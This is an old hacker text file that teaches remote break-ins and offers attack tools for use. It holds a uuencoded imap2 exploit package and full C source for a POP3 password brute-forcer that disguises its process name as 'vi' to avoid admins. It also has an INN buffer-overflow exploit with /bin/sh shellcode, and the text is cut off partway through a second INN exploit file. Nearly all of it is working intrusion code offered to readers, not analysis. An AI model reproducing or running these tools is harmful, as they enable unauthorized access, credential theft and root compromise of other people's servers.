How to get in... (remote)
-------------------------------------
by Phantom
Well, folks, once you've gotten the name of the site, it's fairly hard (:))
to get inside, especially if it has a firewall && stuph..
But, if you get enough info on that site, maybe, just maybe, you might get
in..
So, you might think of programs you could use to get a root shell or maybe a
passwd/shadow file... :)
well, you should definately look for open ports, like
imapd/httpd/sendmail/nntp/pop3 && stuff...
Well, in this file, you wont find any exploits, due to complains about how
we provide stuff to remotely break in somebody's system. So, if you have an
user there, it's your responsability, but if we provide you with such tools,
it seems people think it's our responsability...
so, DONT READ ANY FURTHER!!!!!!!!!!!!!!!!!!!!!!!!!!!
:)
But anyway, if you really need some of those programs, here are a couple of
them...
Here is an uuencoded package to exploit imap2:
begin 644 imap.tgz
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
5AC:TH0UM:$/[O[:_`&NPZ$L`H```
`
end
Now, here's a pop3 hacker...:
/* : After recently installing POP3d on a machine, I played around with it a
: bit and came to a few conclusions:
: 1) It allows for multiple username/password guesses
: 2) There is no logging option for basd user/pass guesses.
: This seems like something just begging to be brute force hacked.
: Any comments? */
#include <stdio.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
/* First, define the POP-3 port - almost always 110 */
#define POP3_PORT 110
/* What we want our program to be masked as, so nosy sysadmins dont kill us */
#define MASKAS "vi"
/* Repeat connect or not - remember, logs still report a connection, so
you might want to set this to 0. If set to 0, it will hack until it finds
1 user/password then exit. If set to 1, it will reconnect and try more
user/passwords (until it runs out of usernames) */
#define RECONNECT 0
/* The function prototypes */
void nuke_string(char *);
int pop_connect(char *);
int pop_guess(char *, char *);
char *getanswer(char *);
char *getanswer_(char *);
void swallow_welcome(void);
void hackity_hack(void);
int popfd;
FILE *popfp;
FILE *userfile;
FILE *dictfile;
char host[255];
char dict[255];
char user[255];
main(int argc, char **argv)
{
if(argc < 4)
{
/* invalid syntax, display syntax and exit */
printf("Syntax: %s host userfile dictfile\n", argv[0]);
exit(0);
}
/* Validate that the host exists */
if(pop_connect(argv[1]) == -1)
{
/* Error */
printf("Error connecting to host %s\n", argv[1]);
exit(0);
}
printf("Connected to: %s\n\n", argv[1]);
/* Check for the existance of the user file */
userfile=fopen(argv[2], "rt");
if(userfile==NULL)
{
/* Error */
printf("Error opening userfile %s\n", argv[2]);
exit(0);
}
fclose(userfile);
/* Checking for the existance of dict file */
dictfile=fopen(argv[3], "rt");
if(dictfile==NULL)
{
/* Error */
printf("Error opening dictfile %s\n", argv[3]);
exit(0);
}
fclose(dictfile);
/* Copy important arguments to variables */
strcpy(host, argv[1]);
strcpy(user, argv[2]);
strcpy(dict, argv[3]);
nuke_string(argv[0]);
nuke_string(argv[1]);
nuke_string(argv[2]);
nuke_string(argv[3]);
strcpy(argv[0], MASKAS);
swallow_welcome();
hackity_hack();
}
void nuke_string(char *targetstring)
{
char *mystring=targetstring;
while(*targetstring != '\0')
{
*targetstring=' ';
targetstring++;
}
*mystring='\0';
}
int pop_connect(char *pophost)
{
int popsocket;
struct sockaddr_in sin;
struct hostent *hp;
hp=gethostbyname(pophost);
if(hp==NULL) return -1;
bzero((char *)&sin,sizeof(sin));
bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
sin.sin_family=hp->h_addrtype;
sin.sin_port=htons(POP3_PORT);
popsocket=socket(AF_INET, SOCK_STREAM, 0);
if(popsocket==-1) return -1;
if(connect(popsocket,(struct sockaddr *)&sin,sizeof(sin))==-1) return -1;
popfd=popsocket;
return popsocket;
}
int pop_guess(char *username, char *password)
{
char buff[512];
sprintf(buff, "USER %s\n", username);
send(popfd, buff, strlen(buff), 0);
getanswer(buff);
sprintf(buff, "PASS %s\n", password);
send(popfd, buff, strlen(buff), 0);
getanswer(buff);
if(strstr(buff, "+OK") != NULL)
{
printf("USERNAME: %s\nPASSWORD: %s\n\n", username, password);
return 0;
}
else return -1;
}
char *getanswer(char *buff)
{
for(;;)
{
getanswer_(buff);
if(strstr(buff, "+OK") != NULL) return buff;
if(strstr(buff, "-ERR") != NULL) return buff;
}
}
char *getanswer_(char *buff)
{
int ch;
char *in=buff;
for(;;)
{
ch=getc(popfp);
if(ch == '\r');
if(ch == '\n')
{
*in='\0';
return buff;
}
else
{
*in=(char)ch;
in++;
}
}
}
void swallow_welcome(void)
{
char b[100];
popfp=fdopen(popfd, "rt");
getanswer(b);
}
void hackity_hack(void)
{
char *un;
char *pw;
char *c;
int found=0;
un=(char *)malloc(512);
pw=(char *)malloc(512);
if(un==NULL || pw==NULL) return;
userfile=fopen(user, "rt");
dictfile=fopen(dict, "rt");
if(userfile == NULL || dictfile == NULL) return;
for(;;)
{
while(fgets(un, 50, userfile) != NULL)
{
found=0;
c=strchr(un, 10);
if(c != NULL) *c=0;
c=strchr(un, 13);
if(c != NULL) *c=0;
while(fgets(pw, 50, dictfile) != NULL && found==0)
{
c=strchr(pw, 10);
if(c != NULL) *c=0;
c=strchr(pw, 13);
if(c != NULL) *c=0;
if(strlen(pw) > 2 && strlen(un) > 2)
if(pop_guess(un, pw)==0)
{
found=1;
fclose(popfp);
close(popfd);
if(RECONNECT==0)
{
free(pw);
free(un);
fclose(userfile);
fclose(dictfile);
exit(0);
}
pop_connect(host);
swallow_welcome();
}
}
fclose(dictfile);
dictfile=fopen(dict, "rt");
}
fclose(dictfile);
fclose(userfile);
free(un);
free(pw);
exit(0);
}
}
Anyways, you will probably need one of these thinggies: INN exploit...
----------------------------- innbuf.c --------------------------------
/*
* This just generates the x86 shellcode and puts it in a file that nnrp
* can send. The offset and/or esp may need changing. To compile
* on most systems: cc innbuf.c -o innbuf. Usage: innbuf [offset] > file.
* (C) 1997 by Method <method@arena.cwnet.com>
* P.S. Feel free to port this to other OS's.
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#define DEFAULT_OFFSET 792
#define BUFFER_SIZE 796
#define ADDRS 80
u_long get_esp()
{
return(0xefbf95e4);
}
int main(int argc, char **argv)
{
char *buff = NULL;
u_long *addr_ptr = NULL;
char *ptr = NULL;
int ofs = DEFAULT_OFFSET;
int noplen;
u_long addr;
int i;
u_char execshell[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x
0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x
52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x0
1"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
if(argc > 1)
ofs = atoi(argv[1]);
addr = get_esp() - ofs;
if(!(buff = malloc(4096))) {
fprintf(stderr, "can't allocate memory\n");
exit(1);
}
ptr = buff;
noplen = BUFFER_SIZE - strlen(execshell) - ADDRS;
memset(ptr, 0x90, noplen);
ptr += noplen;
for(i = 0; i < strlen(execshell); i++)
*ptr++ = execshell[i];
addr_ptr = (unsigned long *)ptr;
for(i = 0; i < ADDRS / 4; i++)
*addr_ptr++ = addr;
ptr = (char *)addr_ptr;
*ptr = '\0';
printf(
"Path: dev.null!nntp\n"
"From: devNull @%s\n"
"Newsgroups: alt.test\n"
"Subject: 4 out of 5 Dweebs prefer INND for getting r00t\n"
"Message-ID: <830201540.9220@dev.null.com>\n"
"Date: 9 Jun 1997 15:15:15 GMT\n"
"Lines: 1\n"
"\n"
"this line left not left intentionally blank\n"
".\n", buff);
}
---------------------------------------------------------------------------
---------------------------- nnrp.c --------------------------------------
/*
* Remote exploit for INN version < 1.6. Requires 'innbuf' program to operate.
* To compile: cc nnrp.c -o nnrp. Usage: nnrp <host> <file generated by innbuf>
.
* (C) 1997 by Method of Dweebs <method@arena.cwnet.com>
*/
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>
#include <netdb.h>
#include <limits.h>
#include <errno.h>
#include <fcntl.h>
#include <time.h>
#define POST "POST\n"
#define SAY(a, b) write(a, b, strlen(b))
#define CHOMP(a, b) read(a, b, sizeof(b))
#define basename(a) bname(a)
char *me;
